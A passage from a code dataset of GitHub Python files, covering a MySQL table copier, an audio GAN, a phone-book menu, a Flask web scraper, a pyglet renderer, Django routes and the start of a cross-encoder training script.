verbose=True)\n","repo_name":"Connorvangraan/MusicGeneration","sub_path":"midi_to_image.py","file_name":"midi_to_image.py","file_ext":"py","file_size_in_byte":10161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1324167194","text":"import os\nimport time\nimport mysql.connector\n\n\ndef connect_to_databases():\n \"\"\" Connect to given databases. Return connections. \"\"\"\n connection1 = mysql.connector.connect(host=os.environ['HOST_1'],\n database=os.environ['DATABASE_1'],\n user=os.environ['USER_1'],\n password=os.environ['PASSWORD_1'])\n connection2 = mysql.connector.connect(host=os.environ['HOST_2'],\n database=os.environ['DATABASE_2'],\n user=os.environ['USER_2'],\n password=os.environ['PASSWORD_2'])\n return connection1, connection2\n\n\ndef extract_create_table_query(cursor):\n \"\"\"\n Connect to first database and return SQL CREATE TABLE query\n in order to use it while target database creation.\n \"\"\"\n create_table_query = \"\"\n show_create_table_query = \"\"\"SHOW CREATE TABLE employees.titles;\"\"\"\n cursor.execute(show_create_table_query)\n create_table_info = cursor.fetchall()\n for element in create_table_info[0][1:][0]:\n create_table_query += element\n return create_table_query\n\n\ndef disconnect_from_databases(connection1, connection2, cursor1, cursor2):\n \"\"\" Terminate connections with databases. 
\"\"\"\n if connection1.is_connected():\n cursor1.close()\n connection1.close()\n print(\"MySQL connection1 closed\")\n if connection2.is_connected():\n cursor2.close()\n connection2.close()\n print(\"MySQL connection2 closed\")\n\n\ndef get_records_from_database(cursor):\n \"\"\" Return table records from given database. \"\"\"\n show_table_query = \"\"\"SELECT * FROM employees.titles\"\"\"\n cursor.execute(show_table_query)\n return cursor.fetchall()\n\n\ndef insert_table_to_database(records, cursor, connection):\n \"\"\" Insert all records to target database. \"\"\"\n start_insert = time.time()\n query = \"\"\"INSERT INTO employees_copy.titles(emp_no, title, from_date, \n to_date) VALUES (%s, %s, %s, %s); \"\"\"\n params = [(record[0], record[1], record[2], record[3]) for record in records]\n cursor.executemany(query, params)\n connection.commit()\n end_insert = time.time()\n print(\"Insert time is {}sec\".format(end_insert - start_insert))\n\n\ndef copy_table_to_database(cursor1, cursor2, connection2):\n \"\"\" Copy table to target database. \"\"\"\n start_copy = time.time()\n create_table_query = extract_create_table_query(cursor1)\n cursor2.execute(\"\"\"{}\"\"\".format(create_table_query))\n records = get_records_from_database(cursor1)\n insert_table_to_database(records, cursor2, connection2)\n end_copy = time.time()\n print(\"Copy time is {}sec\".format(end_copy - start_copy))\n\n\ndef main():\n try:\n connection1, connection2 = connect_to_databases()\n cursor1 = connection1.cursor()\n cursor2 = connection2.cursor()\n copy_table_to_database(cursor1, cursor2, connection2)\n except mysql.connector.Error as error:\n print(\"Error: {}\".format(error))\n finally:\n disconnect_from_databases(connection1, connection2, cursor1, cursor2)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kajtuszd/mysql-operations","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27974513676","text":"from tensorflow import keras\r\nimport tensorflow as tf\r\n\r\n# Needed for exporting to audio\r\nfrom tensorflow.python.ops.numpy_ops import np_config\r\nnp_config.enable_numpy_behavior()\r\n\r\n#https://www.tensorflow.org/tutorials/audio/simple_audio\r\ndataset = keras.utils.audio_dataset_from_directory(\r\n directory=\"audio\",\r\n batch_size=2,\r\n)\r\n\r\ndef squeeze(audio, labels):\r\n audio = tf.squeeze(audio, axis=-1)\r\n return audio, labels\r\n \r\n#dataset = dataset.map(squeeze, tf.data.AUTOTUNE)\r\n\r\n# The following gives us (32, 661500), meaning we have 32 audio files\r\n# per batch, and 661,500 samples per file.\r\n\r\nsample_rate = 44100\r\n\r\n#for example_audio, example_labels in dataset.take(1): \r\n# print(example_audio)\r\n# print(example_audio.shape)\r\n# print(example_audio.dtype)\r\n# print(example_audio[0])\r\n \r\n#for example_audio in dataset.take(1):\r\n \r\n# data = tf.audio.encode_wav(example_audio[0][0].reshape((sample_rate*15, 1)), sample_rate, name=None)\r\n# tf.io.write_file(f\"Generated/example_audio.wav\", data, name=None)\r\n \r\n#exit()\r\n\r\nfrom tensorflow.keras import layers\r\n\r\nlatent_dim = 128\r\n\r\nd_input = keras.Input(shape=(661500, 1))\r\n\r\n# Low frequency is aiming to capture signals as low as 20hz, so (1/20) * 44100 = 2205\r\nd_lowFrequency = layers.Conv1D(64, kernel_size=2205, strides=1, padding=\"same\", name=\"d_lowFrequency_1\")(d_input)\r\n# Mid frequency is aiming to capture signals as low as 
 500hz, so (1/500) * 44100 = ~88\r\nd_midFrequency = layers.Conv1D(128, kernel_size=88, strides=1, padding=\"same\", name=\"d_midFrequency_1\")(d_input)\r\n# High frequency is aiming to capture signals as low as 1000hz, so (1/1000) * 44100 = ~44\r\nd_highFrequency = layers.Conv1D(128, kernel_size=44, strides=1, padding=\"same\", name=\"d_highFrequency_1\")(d_input)\r\n\r\n# Down from 661,500 to 1,323\r\nd_lowFrequency = layers.Conv1D(64, kernel_size=100, strides=50, padding=\"same\", name=\"d_lowFrequency_2\")(d_lowFrequency)\r\nd_lowFrequency = layers.BatchNormalization()(d_lowFrequency)\r\nd_lowFrequency = layers.LeakyReLU(alpha=0.2)(d_lowFrequency)\r\nd_lowFrequency = layers.Conv1D(64, kernel_size=25, strides=10, padding=\"same\", name=\"d_lowFrequency_3\")(d_lowFrequency)\r\nd_lowFrequency = layers.BatchNormalization()(d_lowFrequency)\r\nd_lowFrequency = layers.LeakyReLU(alpha=0.2)(d_lowFrequency)\r\n\r\nd_midFrequency = layers.Conv1D(128, kernel_size=50, strides=10, padding=\"same\", name=\"d_midFrequency_2\")(d_midFrequency)\r\nd_midFrequency = layers.BatchNormalization()(d_midFrequency)\r\nd_midFrequency = layers.LeakyReLU(alpha=0.2)(d_midFrequency)\r\nd_midFrequency = layers.Conv1D(128, kernel_size=25, strides=10, padding=\"same\", name=\"d_midFrequency_3\")(d_midFrequency)\r\nd_midFrequency = layers.BatchNormalization()(d_midFrequency)\r\nd_midFrequency = layers.LeakyReLU(alpha=0.2)(d_midFrequency)\r\nd_midFrequency = layers.Conv1D(128, kernel_size=10, strides=5, padding=\"same\", name=\"d_midFrequency_4\")(d_midFrequency)\r\nd_midFrequency = layers.BatchNormalization()(d_midFrequency)\r\nd_midFrequency = layers.LeakyReLU(alpha=0.2)(d_midFrequency)\r\n\r\nd_highFrequency = layers.Conv1D(128, kernel_size=50, strides=10, padding=\"same\", name=\"d_highFrequency_2\")(d_highFrequency)\r\nd_highFrequency = layers.BatchNormalization()(d_highFrequency)\r\nd_highFrequency = layers.LeakyReLU(alpha=0.2)(d_highFrequency)\r\nd_highFrequency = layers.Conv1D(128, kernel_size=25, strides=10, padding=\"same\", name=\"d_highFrequency_3\")(d_highFrequency)\r\nd_highFrequency = layers.BatchNormalization()(d_highFrequency)\r\nd_highFrequency = layers.LeakyReLU(alpha=0.2)(d_highFrequency)\r\nd_highFrequency = layers.Conv1D(128, kernel_size=10, strides=5, padding=\"same\", name=\"d_highFrequency_4\")(d_highFrequency)\r\nd_highFrequency = layers.BatchNormalization()(d_highFrequency)\r\nd_highFrequency = layers.LeakyReLU(alpha=0.2)(d_highFrequency)\r\n\r\nd_concatenate = layers.Concatenate()([d_lowFrequency, d_midFrequency, d_highFrequency])\r\n\r\nx = layers.BatchNormalization()(d_concatenate)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\nx = layers.Conv1D(128, kernel_size=11, strides=9, padding=\"same\")(x)\r\nx = layers.BatchNormalization()(x)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\nx = layers.Conv1D(128, kernel_size=9, strides=7, padding=\"same\")(x)\r\nx = layers.BatchNormalization()(x)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\nx = layers.Flatten()(x)\r\nx = layers.Dropout(0.2)(x)\r\nd_output = layers.Dense(1, activation=\"sigmoid\")(x)\r\n\r\ndiscriminator = keras.Model(inputs=d_input, outputs=d_output, name=\"discriminator\")\r\n\r\nprint(discriminator.summary())\r\n\r\nlatent_dim = 128\r\n\r\ng_input = keras.Input(shape=(latent_dim,))\r\nx = layers.Dense(21 * 128)(g_input)\r\nx = layers.Reshape((21, 128))(x)\r\n\r\nx = layers.Conv1DTranspose(128, kernel_size=9, strides=7, padding=\"same\")(x)\r\nx = layers.BatchNormalization()(x)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\nx = 
layers.Conv1DTranspose(128, kernel_size=11, strides=9, padding=\"same\")(x)\r\nx = layers.BatchNormalization()(x)\r\nx = layers.LeakyReLU(alpha=0.2)(x)\r\n\r\ng_lowFrequency = layers.Conv1DTranspose(64, kernel_size=25, strides=10, padding=\"same\", name=\"g_lowFrequency_1\")(x)\r\ng_lowFrequency = layers.BatchNormalization()(g_lowFrequency)\r\ng_lowFrequency = layers.LeakyReLU(alpha=0.2)(g_lowFrequency)\r\ng_lowFrequency = layers.Conv1DTranspose(64, kernel_size=100, strides=50, padding=\"same\", name=\"g_lowFrequency_2\")(g_lowFrequency)\r\ng_lowFrequency = layers.BatchNormalization()(g_lowFrequency)\r\ng_lowFrequency = layers.LeakyReLU(alpha=0.2)(g_lowFrequency)\r\n\r\ng_midFrequency = layers.Conv1DTranspose(128, kernel_size=10, strides=5, padding=\"same\", name=\"g_midFrequency_1\")(x)\r\ng_midFrequency = layers.BatchNormalization()(g_midFrequency)\r\ng_midFrequency = layers.LeakyReLU(alpha=0.2)(g_midFrequency)\r\ng_midFrequency = layers.Conv1DTranspose(128, kernel_size=25, strides=10, padding=\"same\", name=\"g_midFrequency_2\")(g_midFrequency)\r\ng_midFrequency = layers.BatchNormalization()(g_midFrequency)\r\ng_midFrequency = layers.LeakyReLU(alpha=0.2)(g_midFrequency)\r\ng_midFrequency = layers.Conv1DTranspose(128, kernel_size=50, strides=10, padding=\"same\", name=\"g_midFrequency_3\")(g_midFrequency)\r\ng_midFrequency = layers.BatchNormalization()(g_midFrequency)\r\ng_midFrequency = layers.LeakyReLU(alpha=0.2)(g_midFrequency)\r\n\r\ng_highFrequency = layers.Conv1DTranspose(128, kernel_size=10, strides=5, padding=\"same\", name=\"g_highFrequency_1\")(x)\r\ng_highFrequency = layers.BatchNormalization()(g_highFrequency)\r\ng_highFrequency = layers.LeakyReLU(alpha=0.2)(g_highFrequency)\r\ng_highFrequency = layers.Conv1DTranspose(128, kernel_size=25, strides=10, padding=\"same\", name=\"g_highFrequency_2\")(g_highFrequency)\r\ng_highFrequency = layers.BatchNormalization()(g_highFrequency)\r\ng_highFrequency = layers.LeakyReLU(alpha=0.2)(g_highFrequency)\r\ng_highFrequency = layers.Conv1DTranspose(128, kernel_size=50, strides=10, padding=\"same\", name=\"g_highFrequency_3\")(g_highFrequency)\r\ng_highFrequency = layers.BatchNormalization()(g_highFrequency)\r\ng_highFrequency = layers.LeakyReLU(alpha=0.2)(g_highFrequency)\r\n\r\ng_concatenate = layers.Concatenate()([g_lowFrequency, g_midFrequency, g_highFrequency])\r\n\r\ng_output = layers.Conv1D(1, kernel_size=5, padding=\"same\", activation=\"tanh\")(g_concatenate)\r\n\r\ngenerator = keras.Model(inputs=g_input, outputs=g_output, name=\"generator\")\r\n\r\nprint(generator.summary())\r\n\r\nimport tensorflow as tf\r\n\r\nclass GAN(keras.Model):\r\n def __init__(self, discriminator, generator, latent_dim):\r\n super().__init__()\r\n self.discriminator = discriminator\r\n self.generator = generator\r\n self.latent_dim = latent_dim\r\n self.d_loss_metric = keras.metrics.Mean(name=\"d_loss\")\r\n self.g_loss_metric = keras.metrics.Mean(name=\"g_loss\")\r\n\r\n def compile(self, d_optimizer, g_optimizer, loss_fn):\r\n super(GAN, self).compile()\r\n self.d_optimizer = d_optimizer\r\n self.g_optimizer = g_optimizer\r\n self.loss_fn = loss_fn\r\n\r\n @property\r\n def metric(self):\r\n return [self.d_loss_metric, self.g_loss_metric]\r\n\r\n def train_step(self, real_images):\r\n real_images = real_images[0]\r\n #print(real_images)\r\n #print(real_images[0])\r\n #print(real_images[0][0])\r\n batch_size = tf.shape(real_images)[0]\r\n random_latent_vectors = tf.random.normal(shape=(batch_size, self.latent_dim))\r\n generated_images = 
self.generator(random_latent_vectors)\r\n #print(\"Generated: \", generated_images[0])\r\n #print(\"Real: \", real_images[0])\r\n combined_images = tf.concat([generated_images, real_images], axis=0)\r\n labels = tf.concat(\r\n [tf.ones((batch_size, 1)), tf.zeros((batch_size, 1))],\r\n axis=0\r\n )\r\n labels += 0.05 * tf.random.uniform(tf.shape(labels))\r\n\r\n with tf.GradientTape() as tape:\r\n predictions = self.discriminator(combined_images)\r\n d_loss = self.loss_fn(labels, predictions)\r\n \r\n grads = tape.gradient(d_loss, self.discriminator.trainable_weights)\r\n self.d_optimizer.apply_gradients(\r\n zip(grads, self.discriminator.trainable_weights)\r\n )\r\n\r\n random_latent_vectors = tf.random.normal(shape=(batch_size, self.latent_dim))\r\n\r\n misleading_labels = tf.zeros((batch_size, 1))\r\n with tf.GradientTape() as tape:\r\n predictions = self.discriminator(self.generator(random_latent_vectors))\r\n g_loss = self.loss_fn(misleading_labels, predictions)\r\n \r\n grads = tape.gradient(g_loss, self.generator.trainable_weights)\r\n self.g_optimizer.apply_gradients(\r\n zip(grads, self.generator.trainable_weights)\r\n )\r\n\r\n self.d_loss_metric.update_state(d_loss)\r\n self.g_loss_metric.update_state(g_loss)\r\n return {\"d_loss\": self.d_loss_metric.result(),\r\n \"g_loss\": self.g_loss_metric.result()}\r\n \r\nclass GANMonitor(keras.callbacks.Callback):\r\n def __init__(self, num_img=3, latent_dim=128):\r\n self.num_img = num_img\r\n self.latent_dim = latent_dim\r\n\r\n def on_epoch_end(self, epoch, logs=None):\r\n random_latent_vectors = tf.random.normal(\r\n shape=(self.num_img, self.latent_dim))\r\n generated_audio = self.model.generator(random_latent_vectors)\r\n #generated_images *= 255\r\n generated_audio.numpy()\r\n\r\n if epoch % 5 == 0:\r\n for i in range(self.num_img):\r\n #img = keras.utils.array_to_img(generated_images[i])\r\n #img.save(f\"generated_img_{epoch:03d}_{i}.png\")\r\n \r\n # We need np_config.enable_numpy_behavior() for the following line\r\n data = tf.audio.encode_wav(generated_audio[0].reshape((sample_rate*15, 1)), sample_rate, name=None)\r\n tf.io.write_file(f\"Generated/generated_music_{epoch:03d}_{i}.wav\", data, name=None)\r\n\r\n #with open(f\"generated_music_{epoch:03d}_{i}.wav\", \"w\") as file:\r\n # file.write(data)\r\n \r\nepochs = 5000\r\n\r\ngan = GAN(discriminator=discriminator, generator=generator, latent_dim=latent_dim)\r\ngan.compile(\r\n #d_optimizer=keras.optimizers.Adam(learning_rate=0.00001),\r\n #g_optimizer=keras.optimizers.Adam(learning_rate=0.0003),\r\n d_optimizer=keras.optimizers.Adam(learning_rate=0.000007),\r\n g_optimizer=keras.optimizers.Adam(learning_rate=0.0004),\r\n loss_fn=keras.losses.BinaryCrossentropy(),\r\n)\r\n\r\ngan.fit(\r\n dataset, epochs=epochs,\r\n callbacks=[GANMonitor(num_img=10, latent_dim=latent_dim)]\r\n)","repo_name":"ewelborn/DnB","sub_path":"DnB.py","file_name":"DnB.py","file_ext":"py","file_size_in_byte":11412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26092097403","text":"location = PVector(0, 200) \nvelocity = PVector(1, 1)\n\ndef setup():\n size(400, 400)\n frameRate(45)\n rectMode(CENTER)\ndef draw():\n background(134)\n location.add(velocity)\n stroke(0)\n strokeWeight (10)\n fill(random(255), random(255), random(255)) # picking random colors, which is taking the easy way out\n rect(location.x,location.y,120,120)\ndef mousePressed(): \n loop() # does not stop when the square reaches the edge\n","repo_name":"Jelonn/zadania","sub_path":"ZADANIE_kwadrat/ZADANIE_kwadrat.pyde","file_name":"ZADANIE_kwadrat.pyde","file_ext":"pyde","file_size_in_byte":441,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71778939986","text":"Telephone_book = {'Rahaf': '0546771330', 'Waleed': '0554258100', 'Sharefh': '0554943200'}\r\nsir_madam_name = input(\"Please enter your name : \")\r\n\r\ndef display_menue():\r\n\tprint(\"\\nHello, Good evening \" + sir_madam_name + \"\\n\")\r\n\tprint(\"**************\\tTelephone Book Menue\\t**************\\n\\n\")\r\n\tprint(\"1) Display Telephone Book\\n\"\r\n\t\t \"2) Display Number\\n\"\r\n\t\t \"3) Display Name\\n\"\r\n\t\t \"4) Add User\\n\"\r\n\t\t \"5) Done \\n\")\r\n\tchoice = input(\"please choose a number : \")\r\n\r\n\tif choice == \"1\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_Telephone_book()\r\n\telif choice == \"2\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_number()\r\n\telif choice == \"3\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_name()\r\n\telif choice == \"4\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tadd_user()\r\n\telif choice == \"5\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tend_process()\r\n\telse:\r\n\t\tprint(\"This is an invalid number\")\r\n\r\ndef display_menue_again():\r\n\tprint(\"----------------------------------------------------\\n\\n\")\r\n\tprint(\"**************\\tTelephone Book Menue\\t**************\\n\\n\")\r\n\tprint(\"1) Display Telephone Book\\n\"\r\n\t\t \"2) Display Number\\n\"\r\n\t\t \"3) Display Name\\n\"\r\n\t\t \"4) Add User\\n\"\r\n\t\t \"5) Done \\n\")\r\n\tchoice = input(\"please choose a number : \")\r\n\r\n\tif choice == \"1\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_Telephone_book()\r\n\telif choice == \"2\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_number()\r\n\telif choice == \"3\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tdisplay_name()\r\n\telif choice == \"4\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tadd_user()\r\n\telif choice == \"5\":\r\n\t\tprint(\"\\n----------------------------------------------------\")\r\n\t\tend_process()\r\n\telse:\r\n\t\tprint(\"This is an invalid number\")\r\n\r\n\r\ndef display_Telephone_book():\r\n\tprint(Telephone_book)\r\n\tdisplay_menue_again()\r\n\r\ndef add_user():\r\n\tnumber_of_users = int(input(\"how many users you want to add : \"))\r\n\r\n\tfor x in range(number_of_users):\r\n\t\tname = input(\"Please enter your name : \") # key\r\n\t\tphone_Number = input(\"Please enter your phone number : \") # value\r\n\t\tTelephone_book[name] = phone_Number\r\n\r\n\tprint(Telephone_book)\r\n\tdisplay_menue_again()\r\n\r\ndef display_number():\r\n\tname = input(\"please enter the name \")\r\n\tif name in Telephone_book:\r\n\t\tprint(Telephone_book[name])\r\n\r\n\r\n\telse:\r\n\t\tprint(\"Sorry, the name is not found \")\r\n\r\n\tdisplay_menue_again()\r\n\r\ndef display_name():\r\n\tphone_Number = input(\"please enter the phone number \")\r\n\tif phone_Number in Telephone_book.values():\r\n\t\t# reverse lookup: dict.keys() takes no argument, so find the matching name instead\r\n\t\tprint([name for name, number in Telephone_book.items() if number == phone_Number][0])\r\n\r\n\telse:\r\n\t\tprint(\"Sorry, the number is not found 
 \")\r\n\r\n\tdisplay_menue_again()\r\n\r\n\r\ndef end_process():\r\n\tprint(\"Thank you for your time! \")\r\n\r\n\r\n\r\ndisplay_menue()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"rahafwmaq/phone_book","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73492610385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 20 08:24:43 2021\n\n@author: Aderoju Adeyemi\n\"\"\"\n\nclass Settings:\n\n\tdef __init__(self):\n\t\t\"\"\"Initialize the game's settings.\"\"\"\n\n\t\tself.screen_width = 1200\n\t\tself.screen_height = 800\n\t\tself.bg_color = (230, 230, 230)\n\t\t# Ship settings\n\t\tself.ship_speed = 1.5","repo_name":"rojuadeyemi/VS-Code","sub_path":"Python/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24045558853","text":"def no_clust(dataframe):\n\timport pandas as pd\n\t'''\n\tThis function will answer 4 questions about important metrics\n\tafter clustering mature peptides from genome of all known subtypes\n\t'''\n\t# Q1: How many clusters there are\n\tdf=pd.DataFrame(pd.crosstab(dataframe['cluster'],dataframe['accession_no']))\n\tprint('\\n 1. There are %i clusters' % df.shape[0])\n\treturn df.shape[0]\n\ndef size_clust(dataframe):\t\n\timport pandas as pd\n\t# Q2: How big is each cluster? (number of proteins in each cluster)\n\tno_prot_in_clust = pd.crosstab(dataframe['cluster'],\n dataframe['prot'],\n margins = False)\n\tprot = pd.DataFrame(no_prot_in_clust)\n\tprot['sum']=no_prot_in_clust.sum(axis=1)\n\tprint('\\n 2. Number of protein in each cluster:')\n\t#print(prot['sum'])\n\treturn prot['sum']\n\ndef clust_icl_all_prot(dataframe):\t\n\timport pandas as pd\n\t# Q3: How many clusters have exactly one protein from every genome\n\tclust = pd.crosstab(dataframe['accession_no'],\n dataframe['cluster'],\n margins = False)\n\ti = sum(clust.sum(axis=0)==clust.shape[0])\n\tprint(\"\\n 3. There are %i clusters have exactly one protein from every genome\" % i)\n\tprint(clust)\n\ndef prot_in_multi_clust(dataframe):\n\timport pandas as pd\n\t# Q4: How many proteins are in multiple clusters?\n\t# create new column for checking prot from genome in cluster\n\tdataframe['unique']=dataframe['accession_no']+'_'+dataframe['prot']\n\tunique = pd.crosstab(dataframe['unique'],\n dataframe['cluster'],\n margins = False)\n\tmulti = pd.DataFrame(unique)\n\tmulti['sum'] = unique.sum(axis=1)\n\tprint('\\n 4. 
%i proteins are in multiple cluster' % sum(multi['sum']>1))\n\treturn sum(multi['sum']>1)","repo_name":"maingoc303/Graph_Genome","sub_path":"metric_functions.py","file_name":"metric_functions.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38796461542","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\ndef scrape_website(url):\n response = requests.get(url)\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n # Scrape articles\n articles = soup.find_all(\"article\")\n article_data = [article.get_text() for article in articles]\n\n # Scrape links\n links = soup.find_all(\"a\")\n link_data = [link[\"href\"] for link in links]\n\n # Scrape products and prices (example)\n products = soup.find_all(\"div\", class_=\"product\")\n product_data = []\n for product in products:\n name = product.find(\"h2\").text.strip()\n price = product.find(\"span\", class_=\"price\").text.strip()\n product_data.append({\"name\": name, \"price\": price})\n\n # Return scraped data\n return {\n \"articles\": article_data,\n \"links\": link_data,\n \"products\": product_data\n }\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef scrape_web_app():\n if request.method == \"POST\":\n url = request.form[\"url\"]\n scraped_data = scrape_website(url)\n\n # Save data to a file\n with open(\"scraped_data.txt\", \"w\") as file:\n file.write(str(scraped_data))\n\n return \"Scraping completed. Data saved to scraped_data.txt file.\"\n\n # Render the HTML form for entering the URL\n return \"\"\"\n \n \n \n \n \n \"\"\"\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"Shahnawaz9999/letlearnGit","sub_path":"simple_web_scrapping_tool.py","file_name":"simple_web_scrapping_tool.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2318038659","text":"import pyglet\nimport pyrr\nfrom pyglet.gl import *\nfrom pyglet.window import mouse\n\nimport core\nimport database\n\n\nclass OrthoCamera:\n def __init__(self):\n self.pos = pyrr.Vector3([0.0, 0.0, 0.0])\n self.zoom = 1.0\n self.width = 1.0\n self.height = 1.0\n\n def set_transform(self):\n transform = pyrr.Matrix44(\n [\n [self.zoom * 2 / self.width, 0, 0, 0],\n [0, self.zoom * 2 / self.height, 0, 0],\n [0, 0, 0, 0],\n [-1 + 2 * self.pos[0] / self.width, -1 + 2 * self.pos[1] / self.height, 0, 1]\n ]\n )\n tmp = transform.flatten()\n glLoadMatrixf((GLfloat * len(tmp))(*tmp))\n\n\ndef draw_rect(top_left, bottom_right):\n glBegin(GL_TRIANGLES)\n\n glVertex2f(top_left[0], top_left[1])\n glVertex2f(top_left[0], bottom_right[1])\n glVertex2f(bottom_right[0], bottom_right[1])\n\n glVertex2f(top_left[0], top_left[1])\n glVertex2f(bottom_right[0], bottom_right[1])\n glVertex2f(bottom_right[0], top_left[1])\n\n glEnd()\n\n\nclass GraphRenderer:\n def __init__(self):\n self._camera = OrthoCamera()\n\n def draw_node(self):\n glColor3f(1.0, 1.0, 1.0)\n draw_rect([20, 120], [60, 100])\n\n def draw(self):\n glPushMatrix()\n self._camera.set_transform()\n\n label = pyglet.text.Label(\"Hello world\")\n label.draw()\n\n self.draw_node()\n\n glPopMatrix()\n\n def translate_view(self, delta):\n self._camera.pos += delta\n\n def zoom_view(self, delta):\n self._camera.zoom += delta[0] / 40\n self._camera.zoom = min(2.0, self._camera.zoom)\n self._camera.zoom = max(0.5, self._camera.zoom)\n\n def 
set_screen_size(self, width, height):\n self._camera.width = width\n self._camera.height = height\n\n\nclass LavenderWindow(pyglet.window.Window):\n def __init__(self, drawable, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._drawable = drawable\n\n def on_draw(self):\n self._drawable.set_screen_size(self.width, self.height)\n glClear(GL_COLOR_BUFFER_BIT)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n self._drawable.draw()\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n delta = pyrr.Vector3([dx, dy, 0])\n\n if buttons & pyglet.window.mouse.MIDDLE:\n self._drawable.translate_view(delta)\n if buttons & pyglet.window.mouse.RIGHT:\n self._drawable.zoom_view(delta)\n\n\ndef launch():\n core.init()\n module_store = core.get_plugin_store()\n\n database.init(module_store)\n\n graph_renderer = GraphRenderer()\n window = LavenderWindow(graph_renderer, width=1000, height=600)\n\n pyglet.app.run()\n\n\nif __name__ == \"__main__\":\n launch()\n","repo_name":"lokehoke/lavender","sub_path":"python/launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18183604861","text":"from django.urls import include, path\nfrom .views import *\n\n\napp_name = \"libraryapp\"\n\n#the name makes it so that you can just reference a path.\n#kind of like a variable name.\n#decoupling--don't have to hard code route in other files.\n#so when you change the name of a route, don't have to change the route path wherever it's referenced.\n\nurlpatterns = [\n path('', home, name='home'),\n path('books/', book_list, name='books'),\n #already built into Python, don't have to build them, just using them\n path('accounts/', include('django.contrib.auth.urls')),\n\n path('book/form', book_form, name='book_form'),\n path('books//', book_details, name='book'),\n path('books//form/', book_edit_form, name='book_edit_form'),\n\n path('librarians/', list_librarians, name='librarians'),\n path('librarians//', librarian_details, name='librarian'),\n\n path('libraries/form', library_form, name='library_form'),\n path('libraries/', list_libraries, name='libraries'),\n path('libraries//', library_details, name='library'),\n\n\n path('logout/', logout_user, name='logout'), \n]","repo_name":"erinepolley/python-book3-library-app","sub_path":"libraryproject/libraryapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39095065133","text":"\"\"\"\nThis example shows how to train a Cross-Encoder for the MS Marco dataset (https://github.com/microsoft/MSMARCO-Passage-Ranking).\n\nThe query and the passage are passed simultaneously to a Transformer network. The network then returns\na score between 0 and 1 indicating how relevant the passage is for a given query.\n\nThe resulting Cross-Encoder can then be used for passage re-ranking: You retrieve for example 100 passages\nfor a given query, for example with ElasticSearch, and pass the query+retrieved_passage to the CrossEncoder\nfor scoring. 
You then sort the results according to the output of the CrossEncoder.\n\nThis gives a significant boost compared to out-of-the-box ElasticSearch / BM25 ranking.\n\nRunning this script:\npython train_cross-encoder.py\n\"\"\"\nfrom torch.utils.data import DataLoader\nfrom sentence_transformers import LoggingHandler, util\nfrom sentence_transformers.cross_encoder import CrossEncoder\nfrom sentence_transformers.cross_encoder.evaluation import CERerankingEvaluator\nfrom sentence_transformers import InputExample\nimport logging\nfrom datetime import datetime\nimport gzip\nimport os\nimport tarfile\nimport tqdm\n\n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n#### /print debug information to stdout\n\n\n#First, we define the transformer model we want to fine-tune\nmodel_name = 'distilroberta-base'\ntrain_batch_size = 32\nnum_epochs = 1\nmodel_save_path = 'output/training_ms-marco_cross-encoder-'+model_name.replace(\"/\", \"-\")+'-'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n\n\n# We train the network on a binary label task\n# Given [query, passage] is the label 0 = irrelevant or 1 = relevant?\n# We use a positive-to-negative ratio: For 1 positive sample (label 1) we include 4 negative samples (label 0)\n# in our training setup. For the negative samples, we use the triplets provided by MS Marco that\n# specify (query, positive sample, negative sample).\npos_neg_ration = 4\n\n# Maximal number of training samples we want to use\nmax_train_samples = 2e7\n\n#We set num_labels=1, which predicts 